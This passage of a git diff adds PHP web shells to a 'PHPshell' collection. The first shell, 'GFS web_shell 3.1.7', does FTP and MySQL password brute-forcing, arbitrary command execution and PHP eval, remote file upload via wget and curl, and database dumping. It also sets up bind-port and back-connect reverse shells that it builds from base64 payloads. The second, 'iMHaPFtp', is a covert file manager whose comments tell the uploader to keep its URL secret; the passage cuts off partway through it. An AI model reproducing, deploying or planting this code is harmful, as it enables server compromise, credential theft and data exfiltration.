}elseif($type2=="login:lib"){ + $input=file($file); + foreach($input as $i=>$v){ + $word=explode(":",$v); + $res.=$word[0]." ".$word[1]." 
"; + } + $lib=explode(" ",$res); + if($type=="ftp"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteFTP: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + foreach($lib as $kk=>$vv){ + $conn_id=ftp_connect($host); + if(!$conn_id){ die("Coud not connect");} + if (ftp_login($conn_id, $v, $lib[$kk])){ + echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + ftp_close($conn_id); + } + } + } + echo "</table>"; + }elseif($type=="mysql"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteMySQL: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + foreach($lib as $kk=>$vv){ + $conn_id=mysql_connect($host,$v,$lib[$kk]); + if($conn_id){ + echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + mysql_close($conn_id); + } + } + } + echo "</table>"; + } + }elseif($type2=="lib:lib"){ + $input=file($file); + foreach($input as $i=>$v){ + $word=explode(":",$v); + $res.=$word[0]." ".$word[1]." "; + } + $lib=explode(" ",$res); + if($type=="ftp"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteFTP: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $count_lib=count($lib); + for($kk=0; $kk<$count_lib; $kk=$kk+2){ + $conn_id=ftp_connect($host); + if(!$conn_id){ die("Coud not connect");} + if (ftp_login($conn_id,$lib[$kk],$lib[$kk+1])){ + echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." 
</td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + ftp_close($conn_id); + } + echo "</table>"; + }elseif($type=="mysql"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteMySQL: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $count_lib=count($lib); + for($kk=0; $kk<$count_lib; $kk=$kk+2){ + if($lib[$kk]!=""){ + $conn_id=mysql_connect($host,$lib[$kk],$lib[$kk+1]); + if($conn_id){ + echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + mysql_close($conn_id); + } + } + echo "</table>"; + } + } +} + +//////////////////////////////////////////////////////////////////////////////// +///////////////////////////////// تخؤ ////////////////////////////////////////// +//////////////////////////////////////////////////////////////////////////////// +echo $HTML; +echo "<font face=Verdana size=2 color=blue><b>"; +echo (rep_char("&nbsp;",15)); +echo "GFS web_shell ver 3.1.7 </b></font>"; +echo "<hr size=3 color=black>"; +sysinfo(); +echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; +echo "<table BORDER=1 align=center>"; +if($r_act=="nav" OR $r_act==NULL){ + echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"nav\"><b>Navigation</b></td>"; +}else + echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio name=\"r_act\" value=\"nav\"><b>Navigation</b></td>"; +if(!$safe_mode){ + if($r_act=="bind"){ + echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"bind\"><b>BindPort</b></td>"; + }else + echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"bind\"><b>BindPort</b></td>"; +} + +if(function_exists(fsockopen)){ + if($r_act=="port"){ + echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"port\"><b>PortScan</b></td>"; + }else + echo "<td 
alling=\"center\"><input type=radio name=\"r_act\" value=\"port\"><b>PortScan</b></td>"; +} +if($r_act=="brute"){ + echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"brute\"><b>Brute</b></td>"; +}else + echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"brute\"><b>Brute</b></td>"; +if($r_act=="eval"){ + echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"eval\"><b>Eval</b></td>"; +}else + echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"eval\"><b>Eval</b></td>"; +echo "<td><input type=submit name=\"b_act\" value=\"Change\"></td></tr></table></form>"; +################## ACTION ###################################################### +if($r_act=="nav" OR $r_act==NULL){ + $box=$_POST['box']; + if($_POST['b_save']){ + $res=save_file($_POST['text'],$_POST['fname'],$_POST['dname']); + }elseif($_POST['b_new_file']){ + open_file($_POST['new'],"wb",$_POST['dname']); + }elseif($_POST['b_open_file']){ + open_file($_POST['fname'],"r",$_POST['dname']); + }elseif($_POST['b_mail']){ + $res="Function under construction!!!!!!!!!"; + }elseif($_POST['b_run']){ + chdir($_POST['wdir']); + $dir=getcwd(); + $res=ex($_POST['cmd']); + }elseif($_POST['b_f_file']){ + chdir($_POST['wdir']); + $dir=getcwd(); + $res=ex("whereis ".$_POST['ffile']); + }elseif($_POST['b_upload']){ + $s="Uploading file ".$_POST['lfilename']." 
use the ".$box; + $res=up_file($_POST['lfilename'],$_POST['tfilename'],$_POST['box']); + }elseif($_POST['b_mydb']){ //آûâîنèى ٌïèٌîê ءؤ + $s="show_exists_db"; + $res=db_show($_POST['host'], $_POST['username'], $_POST['pass']); + }elseif ($_POST['b_runsql']){ //آûïîëيےهى SQL çàïًîٌ + $s="SQL: ".$sql; + $res=run_sql($_POST['sql'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']); + }elseif($_POST['b_base']){ //آûâîنèى ٌïèٌîê ٍàلëèِ + $s="show_exists_tables"; + $res=show_tables($_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']); + }elseif($_POST['b_table']){ //آûâîنèى نàىï ٍàلëèِû + $s="Dump of ".$_POST['tablename']; + $tablename=$_POST['tablename']; + if ($tablename!=""){ + $res=dump_table($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']); + }else + $res="Select table!"; + }elseif($_POST['b_safe_fuck']){ //خلُîن لهçîïàٌيîمî ًهوèىà + $s="Open file ".$sfilename." with MySQL:"; + $res=safe_mode_fuck($_POST['sfilename'],$_POST['host'], $_POST['username'], $_POST['pass'], $_POST['dbname']); + }elseif($_POST['b_dfilename']){ //خلُîن لهçîïàٌيîمî ًهوèىà + $s="Dump in ".$dfilename." 
from ".$_POST['tablename'].":"; + $res=run_sql("SELECT * INTO OUTFILE '".addslashes($_POST['dfilename'])."' FROM ".$_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']); + } + if ($host=="") {$host="localhost";} + if(isset($res)){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>".$s."</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo $res; + echo "</textarea></td></tr></table>"; + } +################## EXECUTE ##################################################### + if(!$safe_mode){ + $dir=getcwd(); + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Run command: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"\" name=\"cmd\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Run\" name=\"b_run\"></td></tr>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"$dir\" name=\"wdir\"></td>"; + echo "</tr></table></form>"; + } + echo "<hr size=3 color=black>"; +#################### UPLOAD #################################################### + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Upload files: </b></td></tr><font size=-2>"; + if ($box==""){ $box="fopen";} + echo ("<tr><td alling=\"center\"><b>Use/from: </b><SELECT name=\"box\">"); + echo("<OPTION>$box</option>"); + echo("<OPTION value=\"PC\">PC</option> + <option value=\"WGET\">WGET</option><option value=\"FETCH\"> + 
FETCH</option><option value=\"LYNX\">LYNX</option> + <option value=\"cURL\">cURL</option> + <option value=\"fopen\">fopen</option></select></td></tr>"); + echo "<tr><td alling=\"center\"><b>File: </b><input type=\"text\" name=\"lfilename\" size=50></td></tr>"; + echo "<tr><td alling=\"center\"><b>Target: </b><input type=\"text\" name=\"tfilename\" + size=30 value=\"$tfilename\"></td></tr>"; + echo "<tr><td alling=\"center\"><input type=\"submit\" name=\"b_upload\" value=\"UPLOAD\"></td></tr></table></form></font></font>"; + echo "<hr size=3 color=black>"; +##################### MySQL #################################################### + if(isset($_POST['host'])){ + $host=$_POST['host']; + } + if(isset($_POST['dbname'])){ + $dbname=$_POST['dbname']; + } + if(isset($_POST['tablename'])){ + $tablename=$_POST['tablename']; + } + if(isset($_POST['sql'])){ + $sql=$_POST['sql']; + } + if(isset($_POST['sfilename'])){ + $filename=$_POST['sfilename']; + } + if(isset($_POST['dfilename'])){ + $dfilename=$_POST['dfilename']; + } + if(isset($_POST['username'])){ + $username=$_POST['username']; + } + if(isset($_POST['pass'])){ + $pass=$_POST['pass']; + } + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>MySQL DB connect: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><b>Host name:</b></td>"; + echo "<td alling=\"center\"><b>DB name:</b></td>"; + echo "<td alling=\"center\"><b>Table name:</b></td>"; + echo "<td alling=\"center\"><b>SQL command: </b></td></tr>"; + echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"host\" value=\"$host\"></td>"); + echo ("<td alling=\"center\"><input type=\"text\" name=\"dbname\" value=\"$dbname\"></td>"); + echo ("<td alling=\"center\"><input type=\"text\" name=\"tablename\" 
value=\"$tablename\"></td>"); + echo ("<td alling=\"center\"><input type=\"text\" name=\"sql\" value=\"$sql\"></td></tr>"); + echo "<tr><td alling=\"center\"><b>User name:</b></tb>"; + echo "<td alling=\"center\"><input type=\"submit\" name=\"b_base\" value=\"Dump DB\"></td>"; + echo "<td alling=\"center\"><input type=\"submit\" name=\"b_table\" value=\"Dump table\"></td>"; + echo "<td alling=\"center\"><input type=\"submit\" name=\"b_runsql\" value=\"Run SQL\"></tb></tr>"; + echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"username\" value=\"$username\"></td><td alling=\"center\"></td><td alling=\"center\"><input type=\"submit\" name=\"b_dtable\" value=\"Download\"></td></tr>"); + echo "<tr><td alling=\"center\"><b>Pass: </b></td>"; + if ($safe_mode){ + echo "<td alling=\"center\"><b>OpenFilename: </b></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>"; + }else + echo "<td alling=\"center\"></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>"; + echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"pass\" value=\"$pass\"></td>"); + if ($safe_mode){ + echo "<td alling=\"center\"><input type=\"text\" name=\"sfilename\" value=\"$filename\"></td><td alling=\"center\"><input type=\"text\" name=\"b_dfilename\" value=\"$dfilename\"></td></tr>"; + }else + echo "<td alling=\"center\"></td><td alling=\"center\"><input type=\"text\" name=\"dfilename\" value=\"$dfilename\"></td></tr>"; + echo ("<tr><td alling=\"center\"><input type=\"submit\" name=\"b_mydb\" value=\"Show exists DB\"></td>"); + if ($safe_mode){ + echo ("<td alling=\"center\"><input type=\"submit\" name=\"b_safe_fuck\" value=\"SafeMode FileOpen\"></td>"); + }else + echo "<td alling=\"center\"></td>"; + echo("<td alling=\"center\"><input type=\"submit\" name=\"b_dfilename\" value=\"Dump table\"></td>"); + echo "</tr></table></font></font>"; + echo "<hr size=3 color=black>"; +################## NAVIGATION ################################################## + list_dir(); +} 
+##################### PortScan ################################################# +if($r_act=="port"){ + if($_POST['host']==""){ + $host="localhost"; + }else + $host=$_POST['host']; + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Scan host: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$host."\" name=\"host\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Scan\" name=\"b_scan\"></td></tr>"; + echo "</tr></table></form>"; + if($_POST['b_scan']){ + portscan($host); + } +} +##################### PortBind ################################################# +if($r_act=="bind"){ + if($_POST['b_bind']){ + if($_POST['box']=="C++"){ + save_file(base64_decode($port_c),"/var/tmp/gfs.c",getcwd()); + ex("gcc /var/tmp/gfs.c"); + unlink("/var/tmp/gfs.c"); + ex("/var/tmp/a.out ".$_POST['port']." &"); + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>".$s."</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo ex("ps -aux | grep a.out"); + echo "</textarea></td></tr></table>"; + } + if($_POST['box']=="Perl"){ + save_file(base64_decode($port_pl),"/var/tmp/gfs.pl",getcwd()); + ex("perl /var/tmp/gfs.pl ".$_POST['port']." 
&"); + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>".$s."</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo ex("ps -aux | grep gfs.pl"); + echo "</textarea></td></tr></table>"; + } + } + if($_POST['b_connect']){ + if($_POST['box']=="C++"){ + save_file(base64_decode($back_connect_c),"/var/tmp/gfs.c",getcwd()); + ex("gcc -o /var/tmp/gfs.c /var/tmp/gfs"); + unlink("/var/tmp/gfs.c"); + ex("/var/tmp/gfs ".$_POST['ip']." ".$_POST['port']." &"); + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>".$s."</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ..."; + echo "</textarea></td></tr></table>"; + } + if($_POST['box']=="Perl"){ + save_file(base64_decode($back_connect_pl),"/var/tmp/gfs.pl",getcwd()); + ex("perl /var/tmp/gfs.pl ".$_POST['ip']." ".$_POST['port']." &"); + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>".$s."</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." 
..."; + echo "</textarea></td></tr></table>"; + } + } + if($_POST['b_proxy']){ + save_file(stripslashes(base64_decode($prx1).$_POST['port'].base64_decode($prx2)),"/var/tmp/gfs.pl",getcwd()); + ex("perl /var/tmp/gfs.pl"); + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>Proxy</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo ex("ps -aux | grep gfs.pl"); + echo "</textarea></td></tr></table>"; + } + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Bind Port: </b></td></tr><font size=-2>"; + echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">"); + echo("<OPTION value=\"C++\">C++</option> + <option value=\"Perl\">Perl</option></select></td></tr>"); + echo "<tr><td alling=\"center\"><b><font face=Verdana size=2>BindPort: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Bind\" name=\"b_bind\"></td></tr>"; + echo "</tr></table></form>"; + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Back connect: </b></td></tr><font size=-2>"; + echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">"); + echo("<OPTION value=\"C++\">C++</option> + <option value=\"Perl\">Perl</option></select></td></tr>"); + echo "<tr><td alling=\"center\"><b><font face=Verdana size=2>RemotePort: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' 
type=\"text\" value=\"26660\" name=\"port\"></td></tr>"; + echo "<tr><td alling=\"center\"><b><font face=Verdana size=2>RemoteIp: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$REMOTE_ADDR."\" name=\"ip\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Connect\" name=\"b_connect\"></td></tr>"; + echo "</tr></table></form>"; + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>HTTPProxy: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><b><font face=Verdana size=2>ProxyPort: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"46660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Create\" name=\"b_proxy\"></td></tr>"; + echo "</tr></table></form>"; +} +##################### Brute #################################################### +if($r_act=="brute"){ + if(isset($_POST['brute_host'])){ + $host=$_POST['brute_host']; + }else + $host="localhost"; + if(isset($_POST['lib'])){ + $lib=$_POST['lib']; + }else + $lib=" [library]"; + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Brute: </b></td></tr><font size=-2>"; + echo "<tr bgcolor=#00ff00><td alling=\"center\"><b>Example lib: </b>login:pass</td></tr>"; + echo ("<tr><td alling=\"center\"><b>Bryte type: </b><SELECT name=\"box1\">"); + echo("<option value=\"login:login\">login:login</option> + <option value=\"login:nigol\">login:nigol</option> + 
<option value=\"login:empty\">login:empty</option> + <option value=\"login:number\">login:number</option>"); + if(function_exists(fopen)){ + echo "<option value=\"login:lib\">login:lib</option>"; + echo "<option value=\"lib:lib\">lib:lib</option>"; + } + echo ("</select></td></tr>"); + echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">"); + echo("<OPTION value=\"mysql\">mysql</option> + <option value=\"ftp\">ftp</option>"); +// if(function_exists(ssh2_connect)){ +// echo "<option value=\"ssh\">ssh</option>"; +// } + echo ("</select></td>"); + echo("<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Brute\" name=\"b_brute\"></td></tr><tr><td alling=\"center\"><b>Host: </b><input type=\"text\" name=\"brute_host\" value=\"".$host."\">(for lib:lib)</td></tr>"); + if(function_exists(fopen)){ + echo "<td alling=\"center\"><b>From lib (if set): <input type=\"text\" name=\"lib\" value=\"".$lib."\">"; + } + echo ("</table></form>"); + if($_POST['b_brute']){ + brute($_POST['box'],$_POST['box1'],$_POST['brute_host'],$_POST['lib']); + } +} +#################### Eval ###################################################### +if($r_act=="eval"){ + if($_POST['b_eval']){ + $eval=str_replace("<?","",$_POST['php_eval']); + $eval=str_replace("?>","",$eval); + eval($eval); + } + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Eval php: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><textarea name=\"php_eval\" cols=90 rows=15></textarea></td></tr><tr><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Eval\" name=\"b_eval\"></td></tr>"; + echo "</tr></table></form>"; +} + +echo "<hr size=3 color=black>"; +echo "<font face=Verdana size=2 color=blue><b>"; +echo (rep_char("&nbsp",15)); 
+echo "(c) GFS</font>";
+echo (rep_char("&nbsp",15));
+echo "<a href=\"http://www.gfs-team.ru\">www.gfs-team.ru</a>";
+echo "<hr size=3 color=black>";
+?>
diff --git a/php/PHPshell/gfs_sh/gfs_sh2.jpg b/php/PHPshell/gfs_sh/gfs_sh2.jpg
new file mode 100644
index 0000000..846d58b
Binary files /dev/null and b/php/PHPshell/gfs_sh/gfs_sh2.jpg differ
diff --git a/php/PHPshell/iMHaPFtp/iMHaPFtp.jpg b/php/PHPshell/iMHaPFtp/iMHaPFtp.jpg
new file mode 100644
index 0000000..660bd2b
Binary files /dev/null and b/php/PHPshell/iMHaPFtp/iMHaPFtp.jpg differ
diff --git a/php/PHPshell/iMHaPFtp/iMHaPFtp.php b/php/PHPshell/iMHaPFtp/iMHaPFtp.php
new file mode 100644
index 0000000..2c003b7
--- /dev/null
+++ b/php/PHPshell/iMHaPFtp/iMHaPFtp.php
@@ -0,0 +1,2061 @@ +<?php +/* + * iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru + * Copyright (C) 2003-2005 iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com> + * + * Bu Kod Tamamiyle ضzgür Yazilimdir. + * Kِtü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir + * Programin amaci ftp olmadan hostunuza baglanti kurup + * Dosya ekleyip kaldira bilmektir. + * Kodumuz 6 Dilde yazilmistir.Server Diline Gِre Otomatik Secim Yapar. + * ------------------------------------------------------------------------- + * Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin + * Ve Asla kimseye bu kodun uzantisini vermeyiniz.!! + * ------------------------------------------------------------------------- + * + * iMHaBiRLiGi PhpFtp V1.1 + * ========================================================================= + * + * BeweiS + * <BeweiS@imhabirligi.com> + * iMHaBiRLiGi Administrator + * Php-Asp-Programlama ve Güvenlik + * + * MicroP_ + * <MicroP_@imhabirligi.com> + * iMHaBiRLiGi Administrator + * Php-Asp-Programlama ve Güvenlik + * + * Libertical + * <libertical@imhabirligi.com> + * iMHaBiRLiGi Yِnetim + * C++, Delphi,Programlama ve Linux Hastasi + * + * PowerGhost + * <powerghost@imhabirligi.com> + * iMHaBiRLiGi Sistem Danismani + * Sistem Danismani + * + * BadSector + * ozgurkaleli@yahoo.com + * iMHaBiRLiGi Yِnetim + * VicualBasic-Delphi Programlama + * Sistemdanismani ve Linux Hastasi + * + * Bu kodun yaziliminda ismi gecen her arkadasimizin + * Katkilari bulunmustur. + * Herbiri ilgi alaninda Basarili olduklari konularda kodumuzu gelistirmemize + * Katkida bulunmuslardir. 
+ * NOT: Kod Hakkinda takildiniz konulari iMHaBiRLiGi Forumlarina Sora bilirsiniz + * http://www.imhabirligi.com + *<iMHaBiRLiGi@imhabirligi.com> +/* ------------------------------------------------------------------------- */ + +/* Diller : + * 'en' - English + * 'de' - German + * 'fr' - French + * 'it' - Italian + * 'se' - Swedish + * 'auto' - autoselect + */ +$lang = 'auto'; + +/* Charset of your filenames: + */ +$charset = 'ISO-8859-1'; + +/* Homedir: + * For example: './' - the script's directory + */ +$homedir = './'; + +/* Size of the Düzenle textarea + */ +$Düzenlecols = 80; +$Düzenlerows = 25; + +/* ------------------------------------------- + * Optional configuration (reTasi # to enable) + */ + +/* Permission of created directories: + * For example: 0705 would be 'drwx---r-x'. + */ +# $dirpermission = 0705; + +/* Permission of created files: + * For example: 0604 would be '-rw----r--'. + */ +# $filepermission = 0604; + +/* Filenames related to the apache web server: + */ +$htaccess = '.htaccess'; +$htpasswd = '.htpasswd'; + +/* ------------------------------------------------------------------------- */ + +if (get_magic_quotes_gpc()) { + array_walk($_GET, 'strip'); + array_walk($_POST, 'strip'); + array_walk($_REQUEST, 'strip'); +} + +if (array_key_exists('image', $_GET)) { + header('Content-Type: image/gif'); + die(getimage($_GET['image'])); +} + +$delim = DIRECTORY_SEPARATOR; + +if (function_exists('php_uname')) { + $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; +} else { + $win = ($delim == '\\') ? true : false; +} + +if (!empty($_SERVER['PATH_TRANSLATED'])) { + $scriptdir = dirname($_SERVER['PATH_TRANSLATED']); +} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) { + $scriptdir = dirname($_SERVER['SCRIPT_FILENAME']); +} elseif (function_exists('getcwd')) { + $scriptdir = getcwd(); +} else { + $scriptdir = '.'; +} +$homedir = relative2absolute($homedir, $scriptdir); + +$dir = (array_key_exists('dir', $_REQUEST)) ? 
$_REQUEST['dir'] : $homedir; + +if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) { + $dir = relative2absolute($dir, $_POST['olddir']); +} + +$directory = simplify_path(addslash($dir)); + +$files = array(); +$action = ''; +if (!empty($_POST['submit_all'])) { + $action = $_POST['action_all']; + for ($i = 0; $i < $_POST['num']; $i++) { + if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') { + $files[] = $_POST["file$i"]; + } + } +} elseif (!empty($_REQUEST['action'])) { + $action = $_REQUEST['action']; + $files[] = relative2absolute($_REQUEST['file'], $directory); +} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) { + $files[] = $_FILES['upload']; + $action = 'upload'; +} elseif (array_key_exists('num', $_POST)) { + for ($i = 0; $i < $_POST['num']; $i++) { + if (array_key_exists("submit$i", $_POST)) break; + } + if ($i < $_POST['num']) { + $action = $_POST["action$i"]; + $files[] = $_POST["file$i"]; + } +} +if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) { + $files[] = relative2absolute($_POST['create_name'], $directory); + switch ($_POST['create_type']) { + case 'directory': + $action = 'create_directory'; + break; + case 'file': + $action = 'create_file'; + } +} +if (sizeof($files) == 0) $action = ''; else $file = reset($files); + +if ($lang == 'auto') { + if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) { + $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2); + } else { + $lang = 'en'; + } +} + +$words = getwords($lang); + +$cols = ($win) ? 4 : 7; + +if (!isset($dirpermission)) { + $dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755; +} +if (!isset($filepermission)) { + $filepermission = (function_exists('umask')) ? 
(0666 & ~umask()) : 0644; +} + +if (!empty($_SERVER['SCRIPT_NAME'])) { + $self = html(basename($_SERVER['SCRIPT_NAME'])); +} elseif (!empty($_SERVER['PHP_SELF'])) { + $self = html(basename($_SERVER['PHP_SELF'])); +} else { + $self = ''; +} + +if (!empty($_SERVER['SERVER_SOFTWARE'])) { + if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') { + $apache = true; + } else { + $apache = false; + } +} else { + $apache = true; +} + +switch ($action) { + +case 'view': + + if (is_script($file)) { + + /* highlight_file is a mess! */ + ob_start(); + highlight_file($file); + $src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents()); + $src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src); + ob_end_clean(); + + html_header(); + echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2> + +<hr /> + +<table> +<tr> +<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray"> +<pre style="margin-top: 0"><code>'; + + for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n"; + + echo '</code></pre> +</td> +<td style="text-align: left; vertical-align: top; padding-left: 3pt"> +<pre style="margin-top: 0">' . $src . '</pre> +</td> +</tr> +</table> + +'; + + html_footer(); + + } else { + + header('Content-Type: ' . getmimetype($file)); + header('Content-Disposition: filename=' . basename($file)); + + readfile($file); + + } + + break; + +case 'indir': + + header('Pragma: public'); + header('Expires: 0'); + header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); + header('Content-Type: ' . getmimetype($file)); + header('Content-Disposition: attachment; filename=' . basename($file) . ';'); + header('Content-Length: ' . 
